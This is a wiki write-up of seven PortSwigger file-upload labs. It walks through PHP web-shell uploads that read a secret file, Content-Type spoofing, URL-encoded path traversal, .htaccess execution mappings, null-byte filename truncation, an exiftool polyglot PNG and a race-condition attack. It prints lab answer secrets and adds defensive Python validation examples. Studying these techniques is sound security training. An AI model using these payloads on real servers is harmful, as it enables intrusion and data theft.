File Upload Vulnerabilities - NANDITHA90/PortSwigger-LABS GitHub Wiki

LAB - 1

Remote code execution via web shell upload

  • About

    • This lab contains a vulnerable image upload function.
    • It doesn't perform any validation on the files users upload before storing them on the server's filesystem.
    • To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
    • Submit this secret using the button provided in the lab banner.
    • You can log in to your own account using the following credentials: wiener : peter

(a) Login

  • wiener : peter

  • After logging in

    • Intercept the traffic in Burp

    • Upload the picture

  • After uploading, you'll get a confirmation page.

  • Now, click Back to My Account

    • You can observe that the picture has been updated

  • In Burp, go to Proxy > HTTP history. Click the filter bar to open the Filter settings dialog. Under Filter by MIME type, enable the Images checkbox, then apply your changes.

  • GET request for the avatar image

    • Send to Repeater

(b) Upload File

  • Modify the filename : myexploit.php

  • Now select the image data in the request body and delete it

  • Write a PHP script in its place

    • <?php echo file_get_contents('/home/carlos/secret'); ?>

(c) Show File

  • In the GET request, modify the path to point at : myexploit.php

(d) Copy the Response

  • Sqei0skZLQ6A06VeWa62gLhdYLbzGs53

  • Now, go to the lab and click : Submit Response

  • Type the copied response

SOLVED


LAB - 2

Web shell upload via Content-Type restriction bypass

  • About

    • This lab contains a vulnerable image upload function.
    • It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
    • To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
    • Submit this secret using the button provided in the lab banner.
    • You can log in to your own account using the following credentials: wiener : peter

(a) Login

  • wiener : peter

  • After logging in

    • Intercept the traffic in Burp

    • Upload the picture

  • After uploading, you'll get a confirmation page.

  • Now, click Back to My Account

    • You can observe that the picture has been updated

(b) GET

  • In Burp, go to Proxy > HTTP history and notice that your image was fetched using a GET request to /files/avatars/<YOUR-IMAGE>. Send this request to Burp Repeater.

  • Create : myexploit.php

    • <?php echo file_get_contents('/home/carlos/secret'); ?>

  • Attempt to upload this script as your avatar.
  • The response indicates that you are only allowed to upload files with the MIME type image/jpeg or image/png.

(c) POST

  • In Burp, go back to the proxy history and find the POST /my-account/avatar request that was used to submit the file upload.
  • Send this to Burp Repeater.

  • In the part of the request body that relates to your PHP file, change the value of the Content-Type header to image/jpeg. The server trusts this client-supplied value.

  • Send the request. Observe that the response indicates that your file was successfully uploaded.

  • Switch to the other Repeater tab containing the GET /files/avatars/<YOUR-IMAGE> request.

  • In the path, replace the name of your image file with myexploit.php and send the request.

  • Observe that Carlos's secret was returned in the response.

Carlos's Secret : ndxDHKUrUYLqj4dAnAcWIkjxbuyIbzwu

SOLVED
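Labs 1 and 2 fall for the same reason: the server either does no check at all or only reads the Content-Type header the client chose. As an added example (not code from this wiki or from PortSwigger), the Python below contrasts that header-only check with one that sniffs the file's own magic bytes; the multipart parts are constructed by hand. Magic bytes are the minimum, not the whole answer, as Lab 6 shows.

```python
# Added example: validate an upload by its bytes, not by the Content-Type
# header the client sends (Lab 2's flaw). Multipart parts are constructed.

# Magic bytes of the two formats the lab's endpoint claims to accept.
MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
}

def parse_part(part: bytes):
    """Split one multipart/form-data part into (headers, body)."""
    head, _, body = part.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n"):
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers, body

def weak_check(part: bytes) -> bool:
    """Lab 2 style: trusts whatever Content-Type the client declared."""
    headers, _ = parse_part(part)
    return headers.get("content-type") in MAGIC

def sniffed_type(body: bytes):
    """Return the image type the bytes actually start with, or None."""
    for mime, magic in MAGIC.items():
        if body.startswith(magic):
            return mime
    return None

def strong_check(part: bytes) -> bool:
    """Ignores the header entirely; only the file's own bytes count."""
    _, body = parse_part(part)
    return sniffed_type(body) is not None

# Constructed: the lab's PHP script relabelled as a PNG.
FORGED = (
    b'Content-Disposition: form-data; name="avatar"; filename="myexploit.php"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
)
# Constructed: a body that really starts with the PNG signature.
GENUINE = (
    b'Content-Disposition: form-data; name="avatar"; filename="pic.png"\r\n'
    b"Content-Type: image/png\r\n\r\n" + MAGIC["image/png"] + b"\x00" * 16
)
```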


LAB - 3

Web shell upload via path traversal

  • About

    • This lab contains a vulnerable image upload function.
    • The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
    • To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
    • Submit this secret using the button provided in the lab banner.
    • You can log in to your own account using the following credentials: wiener : peter

(a) Login

  • wiener : peter

  • After logging in

    • Intercept the traffic in Burp

    • Upload the picture

  • After uploading, you'll get a confirmation page.

  • Now, click Back to My Account

    • You can observe that the picture has been updated

(b) GET

  • In Burp, go to Proxy > HTTP history and notice that your image was fetched using a GET request to /files/avatars/<YOUR-IMAGE>.
  • Send this request to Burp Repeater.

(c) POST

  • In the POST /my-account/avatar request, create a file called myexploit.php containing a script for fetching the contents of Carlos's secret.

  • Upload this script as your avatar. Notice that the website doesn't seem to prevent you from uploading PHP files.

  • In Burp Repeater, go to the tab containing the GET /files/avatars/<YOUR-IMAGE> request.
  • In the path, replace the name of your image file with myexploit.php and send the request.

  • Observe that instead of executing the script and returning the output, the server has just returned the contents of the PHP file as plain text.

  • In Burp's proxy history, find the POST /my-account/avatar request that was used to submit the file upload and send it to Burp Repeater.

(d) POST Disposition

  • In Burp Repeater, go to the tab containing the POST /my-account/avatar request

  • Find the part of the request body that relates to your PHP file.

  • In the Content-Disposition header, change the filename to include a directory traversal sequence

    • Content-Disposition: form-data; name="avatar"; filename="../myexploit.php"

  • Send the request.

  • Notice that the response says the file avatars/myexploit.php has been uploaded.

  • This suggests that the server is stripping the directory traversal sequence from the file name.

(e) Obfuscate

  • Obfuscate the directory traversal sequence by URL encoding the forward slash (/) character, resulting in : filename="..%2fmyexploit.php"

  • Send the request and notice that the response now reports the file name with the traversal sequence intact. This indicates that the file name is being URL decoded by the server after the stripping step.

  • Now, go back to the browser
    • Add : /files/myexploit.php?cmd=ls

  • Again
    • Add : /files/myexploit.php?cmd=whoami

  • Go back to the Burp Suite Proxy History

    • Select the request containing whoami
    • Send to Repeater

  • Click : SEND

Carlos's Secret : rggsq4lH6CgJUBWBDVCPcUwlhuBQOTeb

SOLVED
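The order of operations is the whole bug in Lab 3: the server strips "../" and then URL-decodes, so "..%2f" survives the strip and becomes "../" afterwards. As an added example (not the lab's code), the Python below reproduces that ordering beside a fix that decodes first, keeps only the basename, and verifies the resolved path stays inside the avatar directory. The directory /var/www/files/avatars is an assumed layout matching the lab's /files/avatars/ URL.

```python
# Added example: strip-then-decode (Lab 3's flaw) versus decode-then-contain.
import posixpath
from urllib.parse import unquote

AVATAR_DIR = "/var/www/files/avatars"   # assumed layout behind /files/avatars/

def weak_target(filename: str) -> str:
    """Lab 3 pattern: remove '../', then a later layer URL-decodes the name."""
    stripped = filename.replace("../", "")     # "..%2f" passes untouched
    decoded = unquote(stripped)                # ...and turns into "../" here
    return posixpath.normpath(posixpath.join(AVATAR_DIR, decoded))

def safe_target(filename: str) -> str:
    """Hardened: fully decode first, drop any directory component, then
    prove the final path is still under AVATAR_DIR."""
    decoded = filename
    for _ in range(3):                         # also unwinds %252f double encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    base = posixpath.basename(decoded.replace("\\", "/"))
    if base in ("", ".", "..") or base.startswith("."):
        raise ValueError("rejected filename: %r" % filename)
    target = posixpath.normpath(posixpath.join(AVATAR_DIR, base))
    if posixpath.commonpath([AVATAR_DIR, target]) != AVATAR_DIR:
        raise ValueError("path escapes avatar directory: %r" % filename)
    return target
```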


LAB - 4

Web shell upload via extension blacklist bypass

  • About

    • This lab contains a vulnerable image upload function.
    • Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.
    • To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret.
    • Submit this secret using the button provided in the lab banner.
    • You can log in to your own account using the following credentials: wiener : peter

(a) Login

  • wiener : peter

  • After logging in

    • Intercept the traffic in Burp

    • Upload the picture

  • After uploading, you'll get a confirmation page.

  • Now, click Back to My Account

    • You can observe that the picture has been updated

(b) GET

  • Send the GET /files/avatars/<YOUR-IMAGE> request to Repeater

(c) POST

  • Send the POST /my-account/avatar request to Repeater

(d) Adding PHP

  • In the POST, replace the image data with : <?php echo file_get_contents('/home/carlos/secret'); ?>

  • Change the filename : myexploit.php

  • Attempt to upload this script as your avatar.

  • The response indicates that you are not allowed to upload files with a .php extension.

(e) Modify

  • Change the value of the filename parameter to .htaccess.
  • Change the value of the Content-Type header to text/plain.
  • Replace the PHP script in the body with : AddType application/x-httpd-php .myexploit

  • Successfully uploaded. This directive tells Apache to execute any file ending in .myexploit as PHP, so a blacklist of known extensions no longer protects the directory.

(f) Go Back

  • Click on the back arrow in Repeater to restore the original PHP upload request

  • Now change the filename : myexploit.myexploit

  • Now it's been uploaded successfully

(g) Go to GET

  • Change the path to : myexploit.myexploit

  • Carlos's Secret Code : kr9Pvbeol2TCnOe8trs9D3t3tBAU9Wnt

SOLVED


LAB - 5

Web shell upload via extension blacklist bypass

  • About

    • This lab contains a vulnerable image upload function.
    • Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.
    • To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret.
    • Submit this secret using the button provided in the lab banner.
    • You can log in to your own account using the following credentials: wiener : peter

(a) Login

  • wiener : peter

  • After logging in

    • Intercept the traffic in Burp

    • Upload the picture

  • After uploading, you'll get a confirmation page.

  • Now, click Back to My Account

    • You can observe that the picture has been updated

(b) GET

  • Send the GET /files/avatars/<YOUR-IMAGE> request to Repeater

(c) POST

  • Send the POST /my-account/avatar request to Repeater

(d) Modify

  • Change the filename : myexploit.php

  • Replace the image data with the PHP script : <?php echo file_get_contents('/home/carlos/secret'); ?>

  • Attempt to upload this script as your avatar.

  • The response indicates that you are only allowed to upload JPG and PNG files.

  • Modify the Content-Disposition header : filename="myexploit.php%00.jpg"

  • Uploaded successfully. The extension check saw .jpg, but the stored name was truncated at the null byte.

(e) Go to GET

  • Modify the path : myexploit.php

  • Send
  • Carlos's Secret Code : KocXh3VJU0IEsoodLD0IOXc5Zz7AVCk5

SOLVED
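Labs 4 and 5 both defeat an extension blacklist: Lab 4 by uploading a .htaccess that makes a new extension executable, Lab 5 by a %00 that truncates the stored name. As an added example (not the lab's code), the Python below shows a blacklist check of that shape beside an allowlist check that decodes the name, rejects control bytes and dotfiles, and requires every extension in the name to be harmless. The BLACKLIST contents are an assumption about the kind of list the lab relies on.

```python
# Added example: denylist extension check (Labs 4/5 flaw) versus allowlist.
from urllib.parse import unquote

ALLOWED_EXT = {"jpg", "jpeg", "png"}
BLACKLIST = {"php", "phtml", "php5"}      # assumed: a typical denylist

def blacklist_check(filename: str) -> bool:
    """Lab 4/5 style: only the last extension, only against a denylist.
    Nothing stops .htaccess, a made-up extension, or a %00-truncated name."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext not in BLACKLIST

def allowlist_check(filename: str) -> bool:
    """Hardened: decode first, then refuse anything that is not plainly
    'name.<allowed extension>' with no control bytes or extra extensions."""
    name = unquote(filename)
    if any(ord(c) < 32 or c == "\x7f" for c in name):
        return False                      # raw or %00 NUL: truncation trick
    if name.startswith(".") or "/" in name or "\\" in name:
        return False                      # .htaccess, .user.ini, traversal
    parts = name.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return False
    # Apache may evaluate every suffix (x.php.jpg), so check all of them.
    return parts[-1] in ALLOWED_EXT and not any(p in BLACKLIST for p in parts[1:])
```

The allowlist is only half of the fix: uploads should also live in a directory the web server is configured never to execute from, so a new executable mapping like the one in Lab 4 cannot be introduced by a file in that directory.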


LAB - 6

Remote code execution via polyglot web shell upload

  • About

    • This lab contains a vulnerable image upload function.
    • Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.
    • To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret.
    • Submit this secret using the button provided in the lab banner.
    • You can log in to your own account using the following credentials: wiener : peter

(a) Create a PHP file

  • Open a terminal

  • Execute the command : exiftool Screenshot360.png

(b) Create a Comment

  • Execute the command : exiftool -comment="test" Screenshot360.png

  • Check the metadata again with exiftool

(c) Update PHP File

  • Execute the command : exiftool -comment="<?php echo ' LOOK HERE ' . file_get_contents('/home/carlos/secret') . ' THE SECRET IS TO THE LEFT '; ?>" Screenshot360.png

  • Check the metadata again

(d) Create an Image File

  • Execute the command : exiftool -comment="<?php echo ' LOOK HERE ' . file_get_contents('/home/carlos/secret') . ' THE SECRET IS TO THE LEFT '; ?>" Screenshot360.png -O myexploit.php

  • Check : the output is still a valid PNG, now saved under a .php name

(e) Burp Suite Website

  • Now, go to the lab website in Burp's browser and try uploading the file as your avatar image

  • We can observe that myexploit.php is also accepted, because its contents still begin with a genuine PNG header.

  • Upload it

  • Click : Go back to the Home Page

(f) Burp Suite Proxy History

  • Click on the GET request for /files/avatars/myexploit.php

  • We can observe that Carlos's secret code is printed in the response

    • a80u728JJChFUvKP4YH6FoQNvHGrbx8R

(g) Go to the Website

  • Submit Solution : a80u728JJChFUvKP4YH6FoQNvHGrbx8R

SOLVED
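Lab 6 is the caveat to every magic-byte check: a file that is a real image can still carry PHP in a metadata chunk. As an added example (not the lab's code), the Python below builds a minimal 1x1 PNG with a tEXt "Comment" chunk, the way exiftool stores a PNG comment, shows that a signature check accepts it, and adds a scan for PHP open tags that rejects it. The decisive fix in production is to re-encode uploaded images so no original metadata is stored at all.

```python
# Added example: a signature check passes the Lab 6 polyglot; a content
# scan for PHP tags catches it. The PNG is constructed in code.
import re
import struct
import zlib

PHP_TAG = re.compile(rb"<\?(php|=)")

def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Length + type + data + CRC32 over type and data, per the PNG spec."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def build_png(comment: bytes) -> bytes:
    """1x1 8-bit grayscale PNG with a tEXt chunk keyed 'Comment'."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")            # filter byte + one pixel
    return (b"\x89PNG\r\n\x1a\n"
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"tEXt", b"Comment\x00" + comment)
            + png_chunk(b"IDAT", idat)
            + png_chunk(b"IEND", b""))

def looks_like_png(data: bytes) -> bool:
    """Lab 6's check: a genuine image signature, nothing more."""
    return data.startswith(b"\x89PNG\r\n\x1a\n")

def contains_php(data: bytes) -> bool:
    """Flags an embedded PHP open tag anywhere in the raw file bytes."""
    return PHP_TAG.search(data) is not None

def accept_upload(data: bytes) -> bool:
    return looks_like_png(data) and not contains_php(data)

# The lab's comment payload, embedded in a constructed image.
PAYLOAD = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
POLYGLOT = build_png(PAYLOAD)
```

The raw-byte scan is a detection aid for stored uploads, not a guarantee: a compressed zTXt chunk would hide the tag from it, which is why re-encoding beats scanning.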


LAB - 7

Web shell upload via race condition

  • About

    • This lab contains a vulnerable image upload function.
    • Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them.
    • To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret.
    • Submit this secret using the button provided in the lab banner.
    • You can log in to your own account using the following credentials: wiener : peter

(a) Login

  • wiener : peter

  • After logging in

    • Intercept the traffic in Burp

    • Upload the picture

  • After uploading, you'll get a confirmation page.

  • Now, click Back to My Account

    • You can observe that the picture has been updated

(b) Proxy History

  • Find the GET request for your avatar image

(c) Upload Checks

  • While uploading an IMAGE file : accepted

  • While uploading a NON-IMAGE file : rejected

  • The server prevents you from uploading files that aren't images.

(d) Turbo Intruder

  • If it's not already installed, install it from Extensions > BApp Store > Turbo Intruder > Install

  • Now go to Proxy History

  • Click on the POST request : POST /my-account/avatar

  • Right click on it > Extensions > Turbo Intruder > Send to Turbo Intruder

  • The Turbo Intruder page opens

  • Modify the script so that it sends the PHP upload request and, without waiting, GET requests for the uploaded file. The file exists on disk for a short window before the validation removes it.

(e) Attack

  • At the bottom of the Turbo Intruder page, click : ATTACK

  • When you click ATTACK, there will be 6 requests with different status codes.

  • Carlos's Secret Code : vvuoumtYLpJVOcdgh0afO8WN1lANJH7O

(f) Website

  • Go to the website and paste the secret code

SOLVED
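Lab 7's validation is sound; the flaw is that the file is written into the served directory before the validation runs, so a concurrent GET can fetch it. As an added example (not the lab's code), the Python below contrasts that write-then-validate pattern with a quarantine-then-move pattern, using a probe callback in place of the concurrent request so the window can be observed deterministically. Directories are temporary and constructed by the demo; the PNG check is the signature-only check from the earlier examples.

```python
# Added example: write-then-validate (Lab 7's race) versus quarantine-then-move.
import os
import secrets
import tempfile
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def racy_store(public_dir, name, data, probe=lambda: None):
    """Lab 7 pattern: write first, validate second, delete if bad.
    probe() stands in for a concurrent GET /files/avatars/<name>."""
    path = os.path.join(public_dir, name)
    with open(path, "wb") as f:
        f.write(data)
    probe()                          # the file is fetchable right now
    if not data.startswith(PNG_MAGIC):
        os.remove(path)
        return None
    return path

def safe_store(public_dir, quarantine_dir, data, probe=lambda: None):
    """Hardened: random temp name outside the web root, validate, then an
    atomic os.replace() into the served directory (same filesystem)."""
    fd, tmp = tempfile.mkstemp(dir=quarantine_dir)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    probe()                          # nothing under public_dir yet
    if not data.startswith(PNG_MAGIC):
        os.remove(tmp)
        return None
    final = os.path.join(public_dir, secrets.token_hex(8) + ".png")
    os.replace(tmp, final)
    return final

def demo():
    """Run both stores and return what the simulated concurrent GET saw."""
    bad = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
    seen = {}
    with tempfile.TemporaryDirectory() as root:
        public = os.path.join(root, "public")
        quarantine = os.path.join(root, "quarantine")
        os.makedirs(public)
        os.makedirs(quarantine)
        racy_store(public, "myexploit.php", bad,
                   probe=lambda: seen.__setitem__("racy", os.listdir(public)))
        safe_store(public, quarantine, bad,
                   probe=lambda: seen.__setitem__("safe", os.listdir(public)))
        good = safe_store(public, quarantine, PNG_MAGIC + b"\x00" * 8)
        seen["final"] = good is not None and os.path.isfile(good)
    return seen
```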

